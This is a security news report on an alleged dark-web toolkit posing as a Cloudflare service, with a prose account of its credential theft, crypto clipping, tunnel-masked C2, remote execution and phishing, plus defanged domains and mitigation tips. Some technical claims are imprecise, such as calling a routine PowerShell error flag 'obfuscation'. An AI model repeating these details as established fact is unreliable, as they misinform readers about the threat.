A clandestine threat actor is allegedly selling a sophisticated malware suite masquerading as a Cloudflare enterprise service on dark web forums.
Dubbed “Fake Cloudflare Service,” the toolkit claims to leverage undetected payloads and Cloudflare infrastructure to bypass security systems, with capabilities spanning credential theft, cryptocurrency hijacking, and remote command execution (RCE).
Infiltration and Data Exfiltration
The toolkit employs obfuscated PowerShell scripts (e.g., -ErrorAction SilentlyContinue) to evade detection during deployment.
Once installed, it establishes persistence via a multi-threaded Python script (server.pyw), which initiates:
- Credential Harvesting: Targets browser cookies, saved passwords (including Phantom Wallet and 30+ extensions), and Discord tokens.
- File Exfiltration: Automatically zips sensitive data (private keys, Telegram files, and documents) and exfiltrates it via transfer[.]sh.
- Auth Key Theft: Specifically designed to extract Axiom and Bullx authentication keys, critical for enterprise API access.
Cryptocurrency and Wallet Targeting
The malware integrates a multi-chain crypto clipper capable of intercepting transactions across 20+ blockchain networks, including Ethereum, Solana, and Binance Smart Chain.
This module:
- Modifies wallet addresses in clipboard data.
- Targets browser extensions (e.g., MetaMask) and software wallets.
- Uses Cloudflare Tunnel (via
flask_cloudflared) to mask command-and-control (C2) traffic as legitimate CDN requests.
Remote Command Execution and Phishing
Attackers gain direct system access through a /exec command, enabling arbitrary code execution. This feature aligns with historical Cloudflare vulnerabilities, such as the 2024 cdnjs RCE flaw (CVE-2024-5467), which allowed path traversal exploits.
Additionally, the toolkit abuses Cloudflare Workers for transparent phishing by proxying legitimate login pages (e.g., Microsoft 365, AWS) and intercepting credentials in real-time.
Domain Infrastructure and Evasion
The service provides purchasers with domains routed through Cloudflare’s IPs to mimic legitimate traffic. This tactic mirrors recent campaigns where threat actors exploited Cloudflare’s reverse proxy architecture to host phishing sites.
A sample domain list includes:
| Domain Type | Example | Purpose |
|---|---|---|
| Phishing Landing | auth-cloudflare[.]net | Credential harvesting |
| C2 Server | cdn-api-secure[.]com | Payload delivery |
| Blockchain Proxy | gateway-eth[.]services | Crypto transaction interception |
Cloudflare’s Response and Historical Context
Cloudflare denied hosting malicious domains linked to recent breaches, but its infrastructure remains a recurring attack vector. In February 2025, a misconfigured abuse remediation system caused a 59-minute outage in R2 storage, highlighting systemic risks in its service controls.
The company has faced prior criticism for hosting 40% of typosquatting sites and 62% of major pirate platforms.
Implications and Mitigation
Security firms like Netskope warn that such toolkits exploit Cloudflare’s scale to legitimize attacks. Recommended actions include:
- Enforcing multi-factor authentication (MFA) for all auth keys.
- Monitoring for anomalous Cloudflare Tunnel connections.
- Adopting behavioral analysis tools to detect PowerShell obfuscation and memory-resident payloads.
The listing’s operators remain unidentified, but their product underscores the escalating weaponization of legitimate SaaS platforms in cybercrime.
Cloudflare has yet to comment on this specific campaign.
Also Read:
%20(1).webp?w=1200&resize=1200,0&ssl=1&description=A clandestine threat actor is allegedly selling a sophisticated malware suite masquerading as a Cloudflare enterprise service on dark web forums.){kind=link}